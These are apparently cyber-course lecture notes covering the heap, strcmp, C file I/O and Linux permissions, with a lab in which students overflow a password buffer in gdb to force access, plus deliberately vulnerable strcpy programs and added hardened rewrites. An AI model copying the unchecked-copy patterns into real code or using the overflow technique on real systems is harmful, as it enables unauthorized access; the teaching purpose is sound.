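        fprintf(stderr, "School names must be at most %zu characters.\n",
                sizeof schoolone - 1);
        return 1;
    }
    printf("The best school is %s\n", schoolone);
    printf("The second-best school is %s\n", schoolone[0] ? schooltwo : schooltwo);
    return 0;
}
```

Run it as ./a.out Army Navy and then with a long second argument: the first run behaves exactly like the cadet's program, the second is refused before anything is copied, so the attack from Question 8 has nothing to overwrite. bounded_copy is the reusable piece: it is also what the strcpy in Problem 4 (first_name[6] and "Alexander") should have been, where it reports COPY_TRUNCATED and leaves a terminated "Alexa" rather than nine characters in a six-byte array.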
Security Exercise 7 Answer Sheet

Name:

Question 1:
Question 2:
Question 3:
Question 4:
Questions 5 and 6: (table with columns Address, Value and Description, one row for each byte from BFFFF7CD through BFFFF81A, to be filled in)
Question 7:
Question 8:
Question 9: When you have successfully hacked the cadet's program, show your instructor or lab tech. Your instructor/tech will sign your answer sheet.

_________________________________ Instructor or Lab Tech signature

Chapter 8: The Heap

Objectives: (a) Explain the purpose of the heap and describe how memory on the heap is allocated.

1. The Heap

1.1 Introduction.

We mentioned a few chapters back the fact that when a program is to be executed, the OS reserves a block of main memory for the program’s use. This block of memory is then partitioned into segments. The “text” segment holds the actual program (the machine language instructions, which we can view as assembly-language instructions). The “stack” segment is the memory that the program has available to store information during execution. For example, the program’s variables are stored on the stack. The picture in the figure is full and complete for the programs that we have dealt with up to this point. But it is lacking as a full description for more general programs.
Once a C program is compiled and the corresponding machine code generated, the amount of space for the text segment is fixed. Similarly, the compiler knows about all the variables that we declare in our program, so it can make room for them on the stack as soon as the function that uses them is invoked. The precise placement of data on the stack is completely controlled by the compiler.

Oftentimes when we run a program, we will want to use memory that cannot be anticipated in advance by the compiler (if the compiler had anticipated it, it would have reserved space for it on the stack). For example, suppose we want our program to use an array of characters, but the size of the array is a value that the user will enter at the keyboard while the program is running. The compiler cannot, in advance, predict the size of the array, since the size will depend on whatever value the user happens to enter. So, we need an additional segment of memory that the programmer controls directly. This additional segment is called the heap. The heap, like the stack, varies in size: it grows and shrinks based on the memory needs of the program as it runs. The heap and the stack, in fact, grow towards each other.

Note that the total space available to the heap and the stack together is fixed, so, in a sense, the heap and the stack compete with each other for space. As items are added to the heap, the heap grows and the "bottom of the heap" moves to a higher memory address. As items are added to the stack, the stack grows and the "top of the stack" moves to a lower memory address.

Practice Problem 8.1 Consider the picture above, showing program 1 in memory.
(a) How does the CPU keep track of the program's proper location within the text segment?
(b) How does the CPU keep track of where the stack is located in main memory?

Solution: (a) (b)

1.2 Heap Allocation.
The preceding question might leave you wondering: How does the CPU keep track of where the heap is located in main memory? The answer to this question is: It doesn't. It is up to the programmer to keep track of the heap. The point bears repeating: the compiler takes care of the stack; YOU (the programmer) must take care of the heap.

To allocate memory on the heap, we use the malloc function (declared in stdlib.h, so the program needs #include <stdlib.h>). We tell malloc how many bytes we need (e.g., “space for 6 integers” or “space for 25 characters”), and malloc returns a pointer to the start of the memory that has been allocated on the heap for this purpose. For example, to allocate space for 6 integers (which requires 24 bytes, since an int is four bytes), we would use:

    int *ptr1 ;
    ptr1 = (int *) malloc(24) ;

After these two lines of code execute, ptr1 holds the address of space on the heap for six integers. Note that the argument to malloc is the number of bytes we would like to allocate on the heap (writing 6 * sizeof(int) instead of 24 says the same thing and stays correct if the size of an int ever differs). If the request cannot be satisfied, malloc returns NULL, so a careful program checks the pointer before using it.

Practice Problem 8.2 Write a snippet of C code that will allocate space on the heap for 25 characters.

Solution:

Practice Problem 8.3 Which segment of memory is physically highest (i.e., has the smallest addresses)?
(a) Heap
(b) Stack
(c) Text Segment
(d) Registers

Solution:

Practice Problem 8.4 In which direction does the heap grow?
(a) From the bottom (larger memory address) up (to a smaller memory address).
(b) From the top (smaller memory address) down (to a larger memory address).
(c) It depends on the corresponding number and types of variables currently allocated on the stack.
(d) It depends on the prolonged effects of solar and liquescent additives combined with the chemical makeup of the heap.

Solution:

This whole notion of using the heap may seem mysterious, so let's look in gory detail at an example. Our goal is to write a program that accepts, as command line arguments, a number of bytes to allocate on the heap (to hold character data), and a text string to place in that newly allocated memory.
For example, if we executed our program (./a.out) with command line arguments as shown:

    midshipman@EC310-VM:~ $ ./a.out 10 cyber2

the program would allocate 10 bytes on the heap, store the characters "cyber2" at this location, and output a message telling us the starting address of our 10-byte allocation (the address that will contain the c in "cyber2"). Here is the program to accomplish this. We will examine the program line-by-line. (What in blazes is atoi on line 10? Do not fear! All will be explained below.)

     1  #include<stdio.h>
     2  #include<string.h>
     3  #include<stdlib.h>
     4  int main( int argc , char *argv[ ] )
     5  {
     6      char *ptr ;
     7
     8      int size;
     9
    10      size = atoi( argv[ 1 ] ) ;
    11
    12      ptr = ( char* ) malloc( size );
    13
    14      strcpy( ptr , argv[ 2 ] );
    15
    16      printf("\nThe following is stored on the heap at address %x:", ptr);
    17
    18      printf( "%s \n\n" , ptr );
    19
    20      free( ptr ) ;
    21  }

Practice Problem 8.5 When we run the program above by entering:

    ./a.out 10 cyber2

(a) What is the value of argc?
(b) What are the values of argv[ 1 ] and argv[ 2 ]?
(c) What are the types of argv[ 1 ] and argv[ 2 ]?

Solution: (a) (b) (c)

Line 3 is needed because malloc, atoi and free are declared in stdlib.h. On line 6 we declare a pointer to a character named ptr. Our intent (as we will soon see) is that ptr will point to the first character in a string of characters. On line 8 we declare an integer named size, and then on line 10 we set size equal to the integer value of argv[1]. Recall that the intent of the second command line argument, argv[ 1 ] (the first item after the program name), is to specify the number of bytes that we wish to reserve on the heap. We want to reserve 10 bytes on the heap, so we typed in 10 as the second command line argument. It is important to remember, though, that all command line arguments are stored as strings, so we have to convert argv[1] to an integer. You can convert a string to an integer using the function atoi (which stands for ASCII to integer). Be aware that atoi reports no errors: atoi("abc") simply returns 0, as does atoi of anything else that does not begin with a number. Line 12 then reserves 10 bytes on the heap, and stores the starting address of the first byte in ptr.
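The listing above trusts argv[1] and argv[2] completely: atoi turns a non-number into 0 or a fragment of it, the result of malloc is never checked, and strcpy copies argv[2] in full no matter how small the block is, so ./a.out 3 cyber2 writes seven bytes into a three-byte heap allocation. The following is an added example, not code from the notes: the same task with those three checks in place. parse_size, heap_store, spare_bytes, the status names and the 4096-byte cap are my own choices; the line-by-line walk-through of the notes' program continues after it.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not the program from the notes: argv[1] bytes on the heap
 * with argv[2] stored there, plus the checks the listing skips.  The names
 * and the cap are my own choices. */

#define MAX_ALLOC 4096   /* assumed upper bound on a sensible request */

/* atoi("abc") returns 0 and atoi("10abc") returns 10 without complaint, and a
 * negative or huge value would reach malloc as a size_t.  strtol reports where
 * parsing stopped and whether the value overflowed, so we can insist on a
 * whole string that is a positive number within our cap. */
int parse_size(const char *text, size_t *out)
{
    char *end;
    errno = 0;
    long v = strtol(text, &end, 10);
    if (errno != 0 || end == text || *end != '\0' || v <= 0 || v > MAX_ALLOC)
        return 0;
    *out = (size_t)v;
    return 1;
}

enum store_status { STORE_OK, STORE_TOO_LONG, STORE_NO_MEMORY };

/* Allocate `size` bytes and copy `text` in only if it fits with its NUL;
 * strcpy would run past the end of the block and corrupt whatever the heap
 * keeps after it.  On success *out owns the block and the caller must
 * free() it; on failure *out is NULL and nothing was allocated. */
enum store_status heap_store(size_t size, const char *text, char **out)
{
    size_t needed = strlen(text) + 1;
    *out = NULL;
    if (needed > size)
        return STORE_TOO_LONG;            /* decide before touching the heap */
    char *block = malloc(size);
    if (block == NULL)
        return STORE_NO_MEMORY;           /* malloc can fail; check it */
    memcpy(block, text, needed);
    *out = block;
    return STORE_OK;
}

/* Bytes of the block left unused after the string and its NUL. */
size_t spare_bytes(const char *block, size_t size)
{
    return size - (strlen(block) + 1);
}

int main(int argc, char *argv[])
{
    size_t size;
    char *ptr;

    if (argc != 3 || !parse_size(argv[1], &size)) {
        fprintf(stderr, "usage: %s <bytes 1..%d> <text>\n", argv[0], MAX_ALLOC);
        return 1;
    }
    switch (heap_store(size, argv[2], &ptr)) {
    case STORE_TOO_LONG:
        fprintf(stderr, "\"%s\" needs %zu bytes, only %zu were requested\n",
                argv[2], strlen(argv[2]) + 1, size);
        return 1;
    case STORE_NO_MEMORY:
        fprintf(stderr, "out of memory\n");
        return 1;
    case STORE_OK:
        break;
    }
    printf("The following is stored on the heap at address %p: %s (%zu bytes to spare)\n",
           (void *)ptr, ptr, spare_bytes(ptr, size));
    free(ptr);                            /* give the block back when done */
    return 0;
}
```

./a.out 10 cyber2 behaves like the original (printing the pointer with %p rather than %x, since %x expects an unsigned int, not a pointer); ./a.out 3 cyber2 and ./a.out abc cyber2 are refused with a message instead of corrupting the heap or calling malloc(0).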
At this point, the program's memory is as follows:

Line 14 then copies the string argv[2] into the memory starting at ptr. After line 14, the program's memory looks as follows:

On lines 16 and 18 we print out the heap address at which the copy of argv[2] is stored, followed by the string itself. Here is the output:

So we can refine the picture of this program in memory:

There is one last (important!) point about the heap. If our program no longer needs memory that was allocated on the heap, it should free it up so that it can be reused. This is done with the free function. For example, to free the heap memory in the prior program, we would use the line of code:

    free( ptr ) ;

So, our final program includes line 20.

Practice Problem 8.6
Suppose we run the program shown above with the debugger, and set a breakpoint at line 16. Which of the following is a possible value stored in the instruction pointer eip?
(a) 0x0804848c
(b) 0xbffff810
(c) 0x0804a010
Solution:

Practice Problem 8.7
Suppose we run the program shown above with the debugger, and set a breakpoint at line 16. Which of the following is a possible address for where the variable size is stored?
(a) 0x0804848c
(b) 0xbffff810
(c) 0x0804a010
Solution:

Practice Problem 8.8
The above picture of the stack shows that the variable size is stored "above" (i.e., at lower memory) than ptr. How do we know that this must be the case?
Solution:

For this chapter's security exercise, we have to add a little bit to your C repertoire. For now, we have to cover the string compare command and the syntax for passing an array as an argument to a function. It’ll be fun.

2. More Fun with C

2.1. A new string command

Recall earlier that we were able to enter or change the value of strings using the strcpy command. Specifically, the command

    strcpy( s1 , s2 );

copies the string s2 to the string s1. Another useful command is the string compare command, strcmp. The command

    value = strcmp( s1 , s2 );

compares the strings s1 and s2 character by character.
The function returns an integer greater than zero if s1 > s2 and returns an integer less than zero if s1 < s2. Perhaps most importantly, the function returns zero if the two strings are equal (i.e., identical). To use these functions, you must have the preprocessor directive:

    #include <string.h>

Practice Problem 8.9
What is the output of the following program?

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main( int argc, char *argv[] )
    {
        char string1[ ] = "Happy" ;
        char string2[ ] = "Joyous" ;
        char string3[ ] = "Happy Times" ;
        char string4[ ] = "Happy" ;

        if(strcmp( string1 , string2 ) == 0)
            printf("\n String 1 and String 2 match\n");
        else
            printf("\nString 1 and String 2 do NOT match\n");

        if(strcmp( string1 , string3 ) == 0)
            printf("\nString 1 and String 3 match\n");
        else
            printf("\nString 1 and String 3 do NOT match\n");

        if(strcmp( string1 , string4 ) == 0)
            printf("\nString 1 and String 4 match\n\n");
        else
            printf("\nString 1 and String 4 do NOT match\n");
    }

Solution:

2.2. Passing an array to a function

To pass an array to a function we use the array name as an argument. In the function header, though, the type must be a pointer, since an array name is an address. For example, suppose we had a string (an array of characters) declared as

    char name[ 10 ];

and we wanted to pass this array (as the only argument) to a void function named fun. Then the function call would be

    fun( name );

and the first line of the function definition would be

    void fun( char *input )

Thus, the argument (name) is passed to a parameter (input) which is a pointer to an array of characters.

Problems

1. Suppose I have a C source-code file midshipman.c that creates a pointer to a character buffer as follows to store each student’s alpha code:

    char *alpha_ptr;

(a) What must I type to allocate 20 bytes on the heap for this string?
(b) After the midshipman graduates and this string is no longer needed, what instruction would a responsible programmer include at the end of the program?
(c) Why is it a good idea to include the instruction that you noted in question (b) above?

2. Your friend is writing a program that takes two command line arguments (aside from ./a.out). The idea behind the program is that the user is to provide the number of bytes to allocate on the heap, and a string to place on the heap. For example, if the user enters

    ./a.out 100 cyber2

then the program should allocate 100 bytes on the heap and place the string cyber2 on the heap. However, when your friend runs the program, it seems to execute for 30 seconds or so, and then presents a very unpleasant message:

Your friend knows that you are a genius taking the Cyber-2 course, so she has asked you for help. Her program is shown below. Enter the following program and run it. What is causing your friend's program to crash?

    #include<stdio.h>
    #include<string.h>
    #include<stdlib.h>

    int main( int argc , char *argv[ ] )
    {
        char *ptr ;
        int size;
        int i;

        size = atoi( argv[ 1 ] ) ;

        for(i=0; i=size; i=i+1)
        {
            ptr = ( char* ) malloc( size );
            strcpy( ptr , argv[ 2 ] );
        }
    }

3. Explain, in your own words, how a buffer overflow occurs in memory.

4. Given the following variable declarations and stack diagram (no padding) for a game:

    char user[16];
    int highscore;
    char nickname[x];

    Address        Value         Variable
    0xbffff800->                 <- nickname
    0xbffff80c->   1000          <- highscore
    0xbffff810->   lynn          <- user
    0xbffff820->   0xbffff840    <- Saved ebp
    0xbffff824->   0x080483e0    <- Return Address

This program allows you to enter your nickname when you run it from the command line.

    ./game nickname

(a) What is the value of ‘x’? (# of bytes allocated for nickname)
(b) How many bytes must you put into nickname to completely overwrite highscore?
(c) How could you change the above variable declarations to ensure highscore could not be overwritten?
(d) What is the minimum number of bytes that you can put into nickname to crash the program?
(e) What string can you put into nickname to overwrite highscore with value 16963?

5. Is it possible for the heap and stack to collide? Choose the answer below which most correctly answers this question:
(a) Yes, because the stack builds from the bottom (larger memory address) up (to a smaller memory address) and the heap from the top (smaller memory address) down (to a larger memory address).
(b) Yes, because the heap builds from the bottom (larger memory address) up (to a smaller memory address) and the stack from the top (smaller memory address) down (to a larger memory address).
(c) No, because the stack builds from the bottom (larger memory address) up (to a smaller memory address) and the heap from the top (smaller memory address) down (to a larger memory address).
(d) No, because the heap builds from the bottom (larger memory address) up (to a smaller memory address) and the stack from the top (smaller memory address) down (to a larger memory address).

Security Exercise 8

There are people who make things happen, there are people who watch things happen, and there are people who wonder what happened. To be successful, you need to be a person who makes things happen.

Part 1. Background and Initial Setup

USMA Exchange Cadet Lessheimer and his friend, Exchange Cadet Geekenstein, have written a program to control access to the USMA Knowledge Database (which is a very small text file). The idea is this: To be granted access to the USMA Knowledge Database, when you run the program you also enter a password on the command line. If you enter a valid password, you are granted access. If you enter an invalid password you are denied access.

You start by surreptitiously looking in the trash can outside the cadet’s room.
Amidst the candy-bar wrappers, Doritos bags and empty Kool-Aid containers, you find a piece of paper labeled SECRET SOURCE CODE. Looking at the paper, you see the program below:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int check_password( char *password )
    {
        int auth_flag = 0;
        char password_buffer[16];

        strcpy( password_buffer, password );

        if(strcmp( password_buffer, "donkey" ) == 0)
            auth_flag = 1;
        if(strcmp( password_buffer, "gousma" ) == 0)
            auth_flag = 1;

        return auth_flag;
    }

    int main(int argc, char *argv[])
    {
        if(argc < 2)
            exit(0);

        if ( check_password( argv[1] ) == 0 )
            printf("\n\n Access Denied.\n\n");
        else
            printf("\n\n Access Granted.\n\n");
    }

You have typed this program into the file named accesscontrol.c . To save you the trouble of typing, we have already placed this file on your machine in the EC310 folder under your home directory. Copy this file to the work directory by carefully entering the following at the home directory prompt (make sure you are at your home directory!):

    midshipman@EC310:~ $ cp ec310code/accesscontrol.c work

Verify that you have accesscontrol.c in your work directory by changing to the work directory:

    cd work

and then listing the files in the work directory:

    ls

If you do not have accesscontrol.c in your work directory, STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2.

Part 2. Gaining Access by Buffer Overflow

Before compiling and executing the program, let's first see if we can understand its operation. Suppose I were to run the program (./a.out) by entering at the command line:

    midshipman@EC310-VM:~ $ ./a.out Navy

Question 1. If I ran the program as above, what would be the value of argc?
Question 2. If I ran the program as above, what would be the value of argv[0]?
Question 3. If I ran the program as above, what would be the value of argv[1]?
Question 4. Where does this program begin executing?
Question 5.
What is the purpose of the two lines:

    if(argc < 2)
        exit(0);

Question 6. In main, what is the value of the argument that we give to the function named check_password? (Recall our input as depicted in the command line shown above.)
Question 7. What happens in main if the function named check_password returns a value of 0?
Question 8. What happens in main if the function named check_password returns a value other than 0?
Question 9. Finish this sentence: The function check_password returns the value of the variable named auth_flag. For access to be denied in main, the value of auth_flag that is returned must be equal to ____.
Question 10. Let's look at the function check_password . After the line of code:

    strcpy( password_buffer, password );

executes, what will be stored in password_buffer?

Recall that the function string compare, strcmp, in the generic line of code

    value = strcmp( s1 , s2 );

compares the strings s1 and s2 character by character. The function returns zero if the two strings are equal (i.e., identical).

Question 11. Recalling our presumption that you entered at the command line:

    midshipman@EC310-VM:~ $ ./a.out Navy

will either of the two strcmp operations in the function check_password return a value of zero?
Question 12. Will the function check_password return to main a value equal to zero, or will it return something other than zero?
Question 13. If you enter at the command line:

    midshipman@EC310-VM:~ $ ./a.out Navy

what message will be sent to the screen?

At this point, if you are confused by the operation of the program (on paper), ask your instructor for help. Let's now compile the program:

    gcc -g accesscontrol.c

and run the program. Try out executing the program with a few different command line inputs. You should see that the two secret passwords that will allow access are donkey and gousma . So, you can enter one of these passwords and gain access! But that is not your goal.
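For contrast with the lab target, here is how a defender closes the hole that check_password and the heap program of Section 1 share: both copy a caller-supplied string into a fixed-size buffer with strcpy and no length check. This is an added example of my own, not code from the notes or the lab; copy_bounded, store_on_heap and check_password_safe are names I chose.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bounded replacement for strcpy: copies src into dst only if the whole string
 * plus its terminating NULL fits in dst_size bytes. Returns 0 on success and
 * -1 (leaving dst untouched) when the string is too long, so the caller can
 * refuse the input instead of writing past the end of the buffer. */
static int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    /* memchr never looks further than dst_size bytes into src */
    const char *end = memchr(src, '\0', dst_size);
    if (end == NULL)                       /* no NULL within dst_size: too long */
        return -1;
    memcpy(dst, src, (size_t)(end - src) + 1);   /* +1 copies the NULL too */
    return 0;
}

/* Hardened version of the Section 1 program: allocate 'size' bytes on the heap
 * and store 'text' there. Returns the heap pointer (the caller frees it), or
 * NULL if the size is unusable or the text would not fit. */
char *store_on_heap(long size, const char *text)
{
    char *ptr;
    if (size <= 0)                         /* atoi() of garbage gives 0: reject it */
        return NULL;
    ptr = malloc((size_t)size);
    if (ptr == NULL)                       /* the notes' program never checks this */
        return NULL;
    if (copy_bounded(ptr, (size_t)size, text) != 0) {
        free(ptr);
        return NULL;
    }
    return ptr;
}

/* Hardened version of check_password: same 16-byte buffer and same flag, but an
 * over-long password is refused before anything is copied, so auth_flag can no
 * longer be reached by writing past the end of password_buffer. */
int check_password_safe(const char *password)
{
    int auth_flag = 0;
    char password_buffer[16];

    if (copy_bounded(password_buffer, sizeof password_buffer, password) != 0)
        return 0;                          /* too long: deny, nothing copied */

    if (strcmp(password_buffer, "donkey") == 0)
        auth_flag = 1;
    if (strcmp(password_buffer, "gousma") == 0)
        auth_flag = 1;
    return auth_flag;
}

int main(int argc, char *argv[])
{
    char *ptr;
    if (argc < 3) {                        /* the notes' program reads argv[2] unconditionally */
        fprintf(stderr, "usage: %s <bytes> <text>\n", argv[0]);
        return 1;
    }
    ptr = store_on_heap(atoi(argv[1]), argv[2]);
    if (ptr == NULL) {
        fprintf(stderr, "refused: \"%s\" does not fit in %s bytes\n", argv[2], argv[1]);
        return 1;
    }
    printf("stored \"%s\" on the heap at %p\n", ptr, (void *)ptr);
    free(ptr);
    return 0;
}
```

Run as ./a.out 10 cyber2 it behaves like the original; run as ./a.out 4 cyber2 it refuses instead of overflowing the allocation.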
The cadets might, in the future, change their passwords, in which case you will have to try to find a new version of the source code. Your goal is to find a way to hack the cadet's program so that even if they change the passwords you will be able to gain access. Determine a password that you can enter that will always allow access, regardless of the actual passwords being used by the cadets!

Enter the following commands:

    gcc -g accesscontrol.c
    gdb -q ./a.out
    set dis intel
    list check_password <Enter>
    list main <Enter>

Here is what you would like to accomplish: You notice that in the function check_password, the variable auth_flag is initially set to zero. The only way auth_flag is ever changed is if we enter the correct password. But… perhaps we can change the value of auth_flag by executing a buffer overflow without needing to worry about the correct password!!! Perhaps the incorrect password you enter as the command line argument can be used to change the value of auth_flag !!!

STEP 1: Determine the proper breakpoint for your program.

You want the program to run up to a certain point, then freeze at a breakpoint, allowing you to examine the stack. Where should you set the breakpoint? Looking at the listing on your screen, you want to set the breakpoint to be at a point where you can examine how the command line argument (i.e., what you enter as the pretend password) is situated with respect to the variable auth_flag.

Question 14: Where should you set the breakpoint?

STOP and show your instructor or lab tech your answer to Question 14. With their okay, proceed to Step 2 below.

STEP 2: Run to the breakpoint and examine the stack.
To enter a breakpoint for a program that requires command line arguments (where, let’s say, the command line argument is Navy), you would enter:

    break <whatever number you have for Question 14>
    run Navy

For example, if you answered Question 14 by deciding the breakpoint should be at line 4, you would enter:

    break 4
    run Navy

Now, examine the stack by entering

    i r esp
    i r ebp

Question 15: How many bytes are on the stack?
Question 16: Whose stack frame is this anyway? Is this the stack frame for main?

Examine the stack by entering

    x/60xb $esp

Question 17: Fill in the values in the table below, showing where the base pointer (label as EBP-check_password) and stack pointer (label as ESP-check_password) are pointing to. Label these addresses on your picture.
Question 18: Locate on the stack the two command line arguments. Show these on the table below, labeling them as password_buffer and authflag.

STEP 3: Determine the attack technique.

Question 19: Based on your picture of the stack, design your buffer overflow. Write a clear explanation of how your attack works in the answer space for Question 19.
Question 20: Demonstrate your buffer overflow attack during a run of the program. Your instructor or lab tech will sign off on this.

The program used in this lab was adapted from a program presented in Hacking, the Art of Exploitation, by Jon Erickson, No Starch Press, 2008.

Security Exercise 8 Answer Sheet

Name:

Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17 and Question 18: (Note: Each line in the table below represents four bytes.)

    Address        Contents

Question 19:
Question 20: When you have successfully hacked the cadet's program, show your instructor. Your instructor will sign your answer sheet.
_________________________________
Instructor or Lab Tech signature

Chapter 9: Privilege Management

Objectives:
(a) Describe how permissions are managed and controlled in a multi-user OS environment.
(b) Explain how users can be afforded the limited ability to execute commands with escalated privileges.

1. Files in C

1.1. Introduction

We can use the C language to open files, read from files, write to files and close files. In C, a file name is tied to an integer called the file descriptor. Once we tie a file name to a file descriptor, we work only with the file descriptor.

1.2. Opening a File

Let’s look at a C program, that I’ve named fun_with_files.c, that opens a file named stuff:

    #include<stdio.h>
    #include<stdlib.h>
    #include<string.h>
    #include<fcntl.h>
    #include<sys/stat.h>

    int main( int argc , char *argv[ ] )
    {
        int fd ;

        fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );

        printf("The assigned value of the file descriptor is %d\n",fd);

        if ( fd == -1 )
        {
            printf( "\nFailed to open.\n");
        }
    }

(The two lines #include<fcntl.h> and #include<sys/stat.h> tell the compiler that your program intends to use files. If you will be using files, just (blindly!) include these two lines. The line beginning fd = open( ... ) should be the only line that looks insane to you! Do not fear! This line will be explained below.)

Notice first that we have a few new #include directives at the top of the program. These are necessary for C to work with files. Don’t worry about these lines of code (other than ensuring that they are at the top of the program). The only craziness in the program is the line:

    fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );

At its heart, this line of code ties the file named stuff to an integer value which is placed in the variable fd. This line of code essentially asks the C compiler: “I, the programmer, want to use the file named stuff. I might want to read what is in it. I might want to write to it.
I know that you, the C compiler, do not want to see the file name (in this case, stuff) running around the program, so give me an integer to use as a stand-in for the file named stuff, and place that integer in the variable that I’ve named fd. Then, later, if I want to do something with the file named stuff, I’ll just refer to the integer fd.”

So, let's run the program and see what happens! First, I will look at my home directory:

Now, I will compile and run the program:

We see that C assigned the file named stuff to the file descriptor value of 3 (i.e., fd = 3). If, when dealing with files, C simply cannot figure out what to do, it will assign the integer -1 to the file descriptor. That is why we placed that final if statement at the end—in order to check if the compiler encountered some difficulty.

At this point, you might be thinking: "Okay, so what? What did the program do?" Well, if I now list the files in my home directory once again, I see:

Notice that the file stuff now exists!

1.3. Looking at a File

So far, we have looked at files using the nano editor. Oftentimes we want to look at the contents of a file, with no intention whatsoever to edit the file. In cases where we merely want to view the contents of a file, there is no need to open an editor. Linux provides us with the cat command. The command

    cat filename

will display the contents of the file named filename. For example, if I enter:

    cat fun_with_files.c

I see the contents of the file named fun_with_files.c.

Let's observe the contents of the file named stuff using cat:

and I see … nothing. At this point, you might be thinking: "Okay, so what? What did the program do?"

1.4. Writing to a File

Let's answer the question: "What did the program do?" The program did create the file named stuff, but that is all it did. Specifically, it did not write any contents to the file. The file has been created, but is empty.
So, when we used the cat command to display the contents of the file named stuff, we did indeed see the contents: nothing.

So, let’s modify our program so that we can add content to our file. Before presenting the program, we need to introduce two additional string functions:

    strnlen( buffer , n )          returns the length of the string named buffer, counting at most n characters (so n should be the size of buffer)
    strncat( buffer , "\n" , 1 )   adds a new-line character to the end of the string buffer.

Practice Problem 9.1
What is the output of the program shown below?

    #include<stdio.h>
    #include<string.h>

    int main( int argc , char *argv[ ] )
    {
        char my_string[15] = "USNA Rules!" ;

        printf( "The string is %s" , my_string ) ;
        printf("The string's length is: %d\n" , strnlen( my_string , 15 ) );

        strncat( my_string , "\n" , 1 ) ;
        strncat( my_string , "\n" , 1 ) ;

        printf( "The string is %s" , my_string ) ;
        printf("The string's length is: %d\n" , strnlen( my_string , 15 ) );
    }

Solution:

Notice that the strnlen function does not count the terminating NULL as one of the characters in the string. The terminating NULL (the byte of all zeroes) is certainly there (that is, after all, how the first and third printf statements above knew when to stop), but the presumption is made that when the programmer wants to know the length of the string, the only concern is with the number of characters preceding the NULL.

Now, armed with these two new string commands, let’s modify our program fun_with_files.c so that when we execute the program, we will include a text string as a command line argument. The program will append the text string to the end of the file stuff using the write command. The next page displays our modified program, still named fun_with_files.c . Let's suppose I run this program with the command line argument "To be a midshipman", as shown below:
     1  #include<stdio.h>
     2  #include<stdlib.h>
     3  #include<string.h>
     4  #include<fcntl.h>
     5  #include<sys/stat.h>
     6  #include<unistd.h>
     7  int main( int argc , char *argv[ ] )
     8  {
     9      int fd ;
    10      char *buffer ;
    11
    12      buffer = (char *)malloc(100);
    13
    14      strcpy( buffer , argv[ 1 ] );
    15
    16      strncat( buffer , "\n" , 1 );
    17
    18      fd = open("stuff", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
    19
    20      if ( fd == -1 )
    21      {
    22          printf( "\nFailed to open.\n");
    23          exit(0);
    24      }
    25      write( fd , buffer , strnlen( buffer , 100 ) );
    26
    27      free( buffer );
    28  }

Line 9 declares the integer variable that will hold the file descriptor. Recall that the file descriptor is just a stand-in for the name of the file we will be reading from and writing to. Line 10 declares a string named buffer that, in line 12, is allocated 100 bytes of space on the heap. Line 14 copies argv[1] into buffer, and line 16 adds a newline character to the end of the string named buffer.

At line 17, the picture of our program in main memory looks like this:

Now, line 18 ties the file named stuff to a file descriptor. Lines 20-24 are added to the program so that the user is informed if the compiler had some trouble opening the file. The key line of the program that actually adds something to our file named stuff is line 25:

    write( fd , buffer , strnlen( buffer , 100 ) );

This writes the data pointed to by buffer (which in this case is the string To be a midshipman followed by a new line) into the file whose file descriptor is fd (which is the file named stuff). The third argument to the function tells how many bytes to write.

Let’s run the program, showing the contents of the file named stuff.

Let's run this program two more times, examining the file named stuff along the way:

If I decide to look at the file named stuff using nano, I see:

Practice Problem 9.2
What would happen if we did not have quotation marks in our command line arguments above?
Solution:

You should appreciate the fact that the file stuff is permanent.
If you close VMware and turn off your computer, the file stuff will be there when you turn your computer back on.

1.5. File Closing

After you have finished writing to a file, the file should be closed. The syntax to close a file is

    close( fd );

Again, note that closing a file doesn't delete it! The file is still there, and, if opened by a program later will be in precisely the same condition it was in before it was closed. So, to make the preceding program perfect, we should close the file by adding this line to the end of the program.

2. Linux Access Privileges

2.1 File Access for Reading, Writing and Executing

Every file has access privileges that control who can read, write and execute the file. Every directory has similar privileges, but, for directories, read means “read the contents of the directory,” write means “add or remove files from the directory” and execute means copy files from the directory. You can see the access privileges for a file or directory by entering the ls -l command. The -l stands for long; that is, we want the long listing! A line produced by this command (one line will be produced for each file and directory) might look like this:

    -rwxr-x--x 1 jones happymids 1024 July 16 17:12 happy_times.exe

Here is what the various fields in this line mean:

    -                  The dash indicates a file. If this line item was a directory, the first symbol would have been a d.
    rwxr-x--x          This is our main focus for today… these are the access privileges. More on this below!
    jones              The file owner
    happymids          The file owner also belongs to this group
    1024               The file size
    July 16 17:12      The file creation date
    happy_times.exe    The file name

The important points above: (1) The file is named happy_times.exe and (2) the owner of the file is jones and (3) the access privileges are rwxr-x--x. Let’s look more closely at the nine symbols that comprise the access privileges.
The symbols used are:

    r    for read (which also allows the copying of the file)
    w    for write
    x    for execute
    -    for no access

The first three symbols (i.e., the first triplet) refer to the file owner, the second triplet refers to the owner's group and the third triplet refers to the general public (everyone who has an account on your system). So, given the access privileges that we see in the example above:

    The owner (jones) can read, write to and execute the file happy_times.exe.
    The group (happymids) can read and execute the file happy_times.exe but cannot write to it.
    The general public can do nothing other than execute the file happy_times.exe.

The access privileges are called the mode of the file or directory. The owner of a file can change the access privileges for a file using the change mode (chmod) command. The command’s format is:

Practice Problem 9.3
What are the access privileges for happytimes.exe after the command shown above is entered?
Solution:

Practice Problem 9.4
What command would remove the ability for the public to execute happytimes.exe?
Solution:

Practice Problem 9.5
What single command using the assign operator would assign the public the ability to read and execute happytimes.exe?
Solution:

It should be reiterated that only the owner can change a file's mode. Wait… that's not right… who else can change a file's mode?

Practice Problem 9.6
Who, besides the file's owner, can change a file's mode?
Solution:

Practice Problem 9.7
And just how does one get to be the owner of a file anyway?
Solution:

3. Giving Up a Little Control with sudo and setuid

3.1. User Accounts

Let's take our earlier program, fun_with_files.c and—since we are eight pages into this chapter and no longer having much fun—rename it as: note1.c. Recall that this program takes a text string as a command line argument, and appends the text string to the end of a file. Let's give the file we read from and write to the more practical name of notes.
